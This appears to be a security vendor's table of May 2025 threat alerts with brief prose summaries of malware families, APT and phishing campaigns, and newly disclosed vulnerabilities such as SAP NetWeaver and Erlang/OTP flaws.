ALERTS 2025 MAY HOME AI APT BOTNET CAMPAIGN CRIME CRYPTOCURRENCY EXPLOIT HACKING GROUP OPERATION PHISHING RANSOM SPAM VIRUS VULNEREBILITY
2024 March(16) April(92) May(99) June(94) July(88) August(112) SEPTEMBER(67) October(0) November(0) December(0) 2025 January(36) February(50) March(77) April(54) May(0) June(0) July(0) August(0) SEPTEMBER(0) October(0) November(0) December(0)
DATE |
NAME |
CATEGORY |
SUBCATE |
INFO |
| 28.5.25 | AppleProcessHub infostealer for macOS | AppleProcessHub is the name of a new infostealer variant targeting the macOS platform and masquerading as a system process. | VIRUS | |
| 28.5.25 | Swan Vector APT campaign | A newly APT campaign, dubbed “Swan Vector” has been targeting East Asian nations, particularly Japan and Taiwan. | APT | |
| 28.5.25 | StarFire Ransomware Demands $3,000 in Bitcoin | A group or individual calling themselves "StarFire" has recently emerged in the threat landscape, targeting individual machines with ransomware. | RANSOM | |
| 28.5.25 | DoubleLoader malware | DoubleLoader is a new malware family recently identified in the wild. Its' main functionality, similarly to other loader variants, is to retrieve malicious payloads from attacker-controlled servers and to execute them on the compromised endpoints | VIRUS | |
| 28.5.25 | Another Fake CAPTCHA campaign leads a range of stealers and RATs | There have been reports of another campaign involving fake CAPTCHA pages to deceive users into executing malicious commands via the Windows Run dialog. | ALERTS | VIRUS |
| 23.5.25 | Vidar and StealC infostealers delivered via social engineering | A new campaign distributing Vidar and StealC infostealers variants has been reported by the researchers from Trend Micro. The attackers are leveraging social engineering techniques with the use of TikTok videos in an attempt to entice users into running arbitrary PowerShell commands. | VIRUS | |
| 23.5.25 | Dero cryptominer delivered to vulnerable Docker containers | A new campaign delivering a Dero cryptocurrency miner to vulnerable Docker containers has been reported in the wild. While abusing exposed Docker APIs the attackers inject two malware components called “nginx” and “cloud”. The deployed cryptominer is written in Golang and based off an open-source DeroHE CLI miner project. | CRYPTOCURRENCY | |
| 23.5.25 | TetraLoader distributed in the UAT-6382 campaign | According to recent report from Cisco Talos, a new malicious activity dubbed UAT-6382 has been delivering a new malware called TetraLoader to its victims. The attackers have been leveraging a Cityworks RCE vulnerability (CVE-2025-0994) to get access to the targeted environments and perform the initial reconnaissance. | VIRUS | |
| 23.5.25 | Rhadamanthys delivered via phishing campaign | In a recently observed phishing campaign, we saw attackers attempting to deliver a Rhadamanthys stealer payload by way of a legal lure. Under the guise of a copyright infringement notification, the victim is encouraged to access a PDF for further details. | CAMPAIGN | |
| 22.5.25 | SideWinder APT using old Office Vulnerabilities | A new cyber-espionage campaign by APT group SideWinder has been targeting high-profile government institutions in Bangladesh, Pakistan, and Sri Lanka. The attackers leverage spear-phishing lures paired with geofenced payloads to ensure that only victims in specific countries receives the malicious content. To activate the infection process and deploy the StealerBot malware a combined exploitation of old vulnerabilities (CVE-2017-0199 and CVE-2017-11882) takes place. | ALERTS | APT |
| 23.5.25 | GhostSpy Android malware | GhostSpy is a mobile malware variant recently seen being actively distributed in the wild. Similarly to other prevalent mobile malware strains, GhostSpy leverages Android Accessibility Services in order to sideload malicious .apk packages on the targeted devices. | VIRUS | |
| 23.5.25 | Fake KeePass installers distributed in attacks targeting ESXi environments |
KeePass is a popular open source password manager
application. Recently there have been reports about an ongoing campaign
distributing fake KeePass installers targeted at ESXi environments.
|
HACKING | |
| 23.5.25 | CVE-2024-7399 & CVE-2025-4632 - Samsung MagicINFO vulnerabilities | CVE-2024-7399 is an unauthenticated remote code execution (RCE) vulnerability affecting the Samsung MagicINFO 9 Server. The flaw enables attackers to upload malicious .jsp files via unauthenticated POST requests effectively allowing them to execute arbitrary OS commands as a result. | VULNEREBILITY | |
| 23.5.25 | Spoofed Japan's e-Tax email notifications appear in phish runs | E-Tax is the National Tax Agency's online tax website that helps to file tax returns and pay national corporation taxes. Recently, Symantec has observed phishing attempts mimicking e-Tax, enticing users to open fake notification emails. | PHISHING | |
| 23.5.25 | Malvertising lures victims to fake Kling AI website | Threat Actors use social media malvertising to lure victims to fake pages impersonating Kling AI platform. The campaign directs visitors to use the platform to create AI-generated images and videos. | AI | |
| 23.5.25 | Trojanized installer delivers Bumblebee loader | It was recently observed that the installer package for the RVTools application was trojanized with a Bumblebee loader dll. RVTools is free utility that collects and displays a multitude of information related to Virtual Machines in VMware environments. | VIRUS | |
| 23.5.25 | Russia-Ukraine conflict comes in picture in a new Binance phishing wave | Binance is one of the world's major cryptocurrency exchanges that allows users to buy, sell and trade various digital assets, including Bitcoin, Ethereum, and altcoins. Lately, Symantec has observed phish runs that impersonate Binance services and entices users to open fake notification emails. | PHISHING | |
| 16.5.25 | Stealthy Shellcode loader executes Remcos RAT in Fileless Attack Chain | A sophisticated fileless malware campaign has been observed leveraging PowerShell to deploy the Remcos RAT. The attack begins with malicious LNK files embedded in ZIP archives, often masquerading as Office documents. These trigger obfuscated VBScript via mshta.exe leading to the in-memory execution of a PowerShell script. | VIRUS | |
| 16.5.25 | Earth Ammit cyber espionage campaigns | The Threat Actor known as Earth Ammit launched two distinct cyber espionage campaigns (dubbed VENOM and TIDRONE) across Central Asia, Southeast Asia, and Eastern Europe. These campaigns strategically target government entities and critical infrastructure - such as software service providers and upstream vendors across several critical sectors, including heavy industry, media, technology, healthcare, and military. | CAMPAIGN | |
| 16.5.25 | TransferLoader malware | TransferLoader is a newly identified malware loader active since February 2025, consisting of three components: a downloader, a backdoor and a backdoor loader. It uses advanced evasion techniques such as anti-debugging, runtime string decryption and junk code insertion to avoid detection and complicate reverse engineering. | VIRUS | |
| 16.5.25 | New DarkCloud malware uses AutoIt obfuscation in targeted attacks | According to a report published by Palo Alto Networks Unit 42, a new variant of the DarkCloud Stealer malware has been observed primarily targeting government organizations worldwide. The attack typically begins with phishing emails containing either a RAR archive or a PDF which prompts victims to download a malicious archive disguised as a software update. | VIRUS | |
| 16.5.25 | Chihuahua Stealer malware | Chihuahua Stealer is a new .NET-based infostealer distributed via a multi-staged campaign. The attackers leverage malicious documents hosted on the Google Drive repository and malicious PowerShell scripts to initiate the infection chain. The final payload - Chihuahua Stealer is delivered from a OneDrive repository path and has the functionality to collect and exfiltrate various sensitive data from the compromised endpoints including system information, data stored in the system web browsers, cryptocurrency wallet information, etc. | VIRUS | |
| 16.5.25 | PupkinStealer: A .NET-based Malware | PupkinStealer, a .NET-based malware has been observed being distributed via phishing emails containing malicious attachments or links. Targeting Windows users, the malware is capable of stealing sensitive data from Chromium-based browsers, Telegram, Discord, email clients, clipboard contents and more. The stolen data is compressed into a ZIP archive and exfiltrated using the Telegram Bot API. | VIRUS | |
| 13.5.25 | BTMOB RAT | According to recent reports, BTMOB RAT has resurfaced and now aims to steal Alipay PINs by mimicking the app’s interface. It spreads via phishing sites disguised as popular services and uses fake apps to lure victims. | VIRUS | |
| 13.5.25 | Noodlophile Stealer spread under the disguise of fake AI tools | An infostealing variant dubbed Noodlophile Stealer has been recently distributed in campaigns leveraging lures of AI video generators. The attackers have been advertising their fake AI platforms via social media platforms. The users are first asked to upload either photos or video for the AI to enhance and then are served with a download link for the supposedly edited content. | VIRUS | |
| 13.5.25 | Astryrean Stealer malware | Astryrean Stealer is a new Python-based infostealer recently identified in the wild. The malware targets collection and exfiltration of a wide variety of confidential or sensitive information including: compromised system information, data stored in system web browsers, Discord tokens or screenshots, among others. | VIRUS | |
| 13.5.25 | More_eggs served by Venom Spider | In a recent campaign threat actor known as "Venom Spider" has been targeting corporate hiring managers and recruiters with a complex spear-phishing scheme that capitalizes on the need for such users to open email attachments or click on links to review an applicants resume . | CAMPAIGN | |
| 9.5.25 | Earth Kasha threat actor targets Taiwan and Japan in a recent campaign | As recently reported by the researchers from Trend Micro, Earth Kasha threat group continues to target users in Taiwan and Japan. The attackers leverage a dropper malware dubbed RoamingMouse that comes in the form of a macro-enabled MS Excel file. | APT | |
| 9.5.25 | Deployment of RMM tools in malicious campaigns targeting Brazil | A new malicious campaign targeting users from Brazil has been reported by researchers from Cisco Talos. The attackers leverage a variety of commercial Remote Monitoring and Management (RMM) tools such as PDQ Connect and N-able remote access software. | VIRUS | |
| 9.5.25 | Mamona Ransomware |
Mamona Ransomware is a newly discovered threat in the
commodity ransomware landscape that operates entirely offline, with no
external communication or data exfiltration. The malware uses custom
encryption routines to encrypt user files, renaming them with the .HAes
extension.
|
RANSOM | |
| 9.5.25 | Mail campaign delivers Java-based RAT | A malicious email campaign was recently observed targeting organizations in Italy, Portugal, and Spain. The campaign leveraged a Spanish email service provider in an effort to legitimize the emails which contained a PDF attachment. | ||
| 9.5.25 | LZRD - the latest Mirai variant distributed in the wild | New campaigns distributing Mirai botnet have been reported in the wild. The malware exploits two command injection vulnerabilities affecting GeoVision IoT devices that have been disclosed last year - CVE-2024-6047 and CVE-2024-11120. | BOTNET | |
| 9.5.25 | CVE-2025-31324 - a critical SAP NetWeaver vulnerability | CVE-2025-31324 is a recently disclosed critical (CVSS score 10) unrestricted file upload vulnerability affecting the SAP NetWeaver Visual Composer. | VULNEREBILITY | |
| 9.5.25 | CVE-2025-32433 - Erlang/OTP SSH RCE vulnerability | CVE-2025-32433 is a recently disclosed Remote Code Execution (RCE) vulnerability affecting Erlang/OTP which is a set of libraries for the Erlang programming language. If successfully exploited, the flaw might allow unauthenticated attackers to gain access to affected Erlang/OTP SSH servers and execute arbitrary commands. | VULNEREBILITY | |
| 9.5.25 | Bert Ransomware | In April, a new ransomware actor known as "Bert" was observed operating in the wild and allegedly claimed several organizations as victims, including those in the Healthcare, Technology, and Event Services sectors across the US and Turkey. | RANSOM | |
| 9.5.25 | NETXLOADER - a new loader used by the Agenda ransomware group | In a recent report, details about a new malware loader named NETXLOADER have been shared. This loader, along with SmokeLoader, has been used in attacks perpetrated by the Agenda ransomware group. | VIRUS | |
| 9.5.25 | Threat Actors use Pahalgam attack in malicious campaign | In a strategic approach to exploiting current events threat actors target Indian government personnel using decoy documents referencing the recent Pahalgam attack in a malicious campaign. | VIRUS | |
| 9.5.25 | FormBook malware distributed via weaponized Word Docs | A recent attack beginning with phishing emails containing malicious MS Word documents as attachments has been observed. Social engineering plays a part in luring users to click on the weaponized attached document. | VIRUS | |
| 9.5.25 | Balloonfly ransomware group leveraged 0-day in attack | The Symantec Threat Hunter team recently observed activity which can be attributed to the Balloonfly attack group. This group is typically responsible for distributing Play ransomware. | VULNEREBILITY | |
| 9.5.25 | CVE-2025–34028: Commvault Command Center Path Traversal Vulnerability | CVE-2025-34028 is a critical vulnerability found in the Command Center installation, enabling remote attackers to execute arbitrary code without authentication. | VULNEREBILITY | |
| 9.5.25 | Notaires de France Impersonated in Telegram-based Phishing Campaign | Symantec has identified a credential phishing campaign leveraging malicious HTML that mimic official French notarial services – a professional body of state-appointed legal officers, known as notaires. It serves as a central information hub for legal matters in France involving notarized acts. | PHISHING | |
| 9.5.25 | StealC V2: Enhanced capabilities | An enhanced version of the popular information stealer, StealC, has been observed. It features an upgraded control panel, a streamlined JSON-based C2 communication protocol and expanded payload delivery options including MSI packages and PowerShell scripts. | VIRUS | |
| 9.5.25 | TerraStealerV2 and TerraLogger malware families | Two new malware families, TerraStealerV2 and TerraLogger, have been reported in the wild and are associated with the financially motivated threat group Golden Chickens. | VIRUS | |
| 9.5.25 | Tax season targeted by modified Stealerium Infostealer | As U.S. tax day approaches, threat actors have been observed exploiting the season by distributing a modified version of the Stealerium infostealer through phishing emails. Malicious LNK files, disguised as tax-related documents like tax forms lure users into executing a Base64-encoded PowerShell script. | ALERTS | VIRUS |
| 2.5.25 | MintsLoader: The loader powering TAG-124’s targeted campaigns | MintsLoader, a sophisticated loader first observed in 2024, is extensively used by TAG-124, more than by any other threat actor to deploy malicious payloads such as GhostWeaver, StealC and a modified BOINC client. These attacks primarily target sectors including industrial, legal and energy. | VIRUS | |
| 2.5.25 | Discovery Bank Impersonated in FICA-Themed Smishing Scam | Discovery Bank, a well-known digital bank in South Africa, has had its brand abused by a group or individual in a recent smishing campaign aimed at harvesting mobile users' banking credentials. The attack begins with a malicious SMS that leverages FICA (Financial Intelligence Centre Act in South Africa) compliance as a lure. | PHISHING | |
| 2.5.25 | ClickFix social engineering tactic being used by various APT groups | ClickFix has gained traction in targeted espionage operations across multiple APT groups from North Korea, Iran, and Russia. This is a social engineering tactic where malicious websites impersonate legitimate software or document sharing platforms. | APT | |
| 2.5.25 | Iranian threat actor targeted critical Middle Eastern infrastructure | Researchers at Fortinet have recently published their investigation into an Iranian threat actor's attack against critical infrastructure in the Middle East. | APT | |
| 2.5.25 | Spear phishing campaign targets WUC with trojanized Uyghur Text Editor | A spear phishing campaign delivering surveillance malware targeting high profile members of the World Uyghur Congress (WUC) has been reported. As part of the attack a trojanized version of a legitimate Uyghur language text editor to gain remote access, collect system information, and manipulate files. | PHISHING | |
| 2.5.25 | Pentagon Stealer | Pentagon Stealer is a recently identified malware strain built using both Python and Golang, engineered to exfiltrate a broad array of sensitive information. It primarily targets browser credentials, cookies, cryptocurrency wallet data and authentication tokens from apps like Discord and Telegram. | VIRUS | |
| 2.5.25 | Hannibal Infostealer | Hannibal Infostealer is a sophisticated malware observed in the wild, rebranded from the Sharp and TX stealer families. Developed in C#, it targets both Chromium and Gecko-based browsers, extracting sensitive data while bypassing browser protection. | VIRUS | |
| 2.5.25 | TypeLib hijacking via Teams | A Microsoft Teams phishing campaign was found to spread a unique PowerShell backdoor in recent attacks. The Threat Actor known as Storm-1811 initiates the attack by employing social engineering tricks on a targeted employee via Microsoft Teams chat, posing as internal IT support staff. | PHISHING | |
| 2.5.25 | Gremlin Stealer | Gremlin Stealer is a new C#-based malware variant recently discovered by the researchers from Palo Alto. Gremlin Stealer is currently advertised for sale via Telegram channels. | VIRUS | |
| 2.5.25 | CVE-2025-24054 - NTLM vulnerability exploited in the wild | CVE-2025-24054 is a recently disclosed vulnerability related to NTLM (New Technology LAN Manager) hash disclosure via spoofing. With help of crafted .library-ms files, an unauthorized attacker might be able to perform spoofing over the network. | ALERTS | VULNEREBILITY |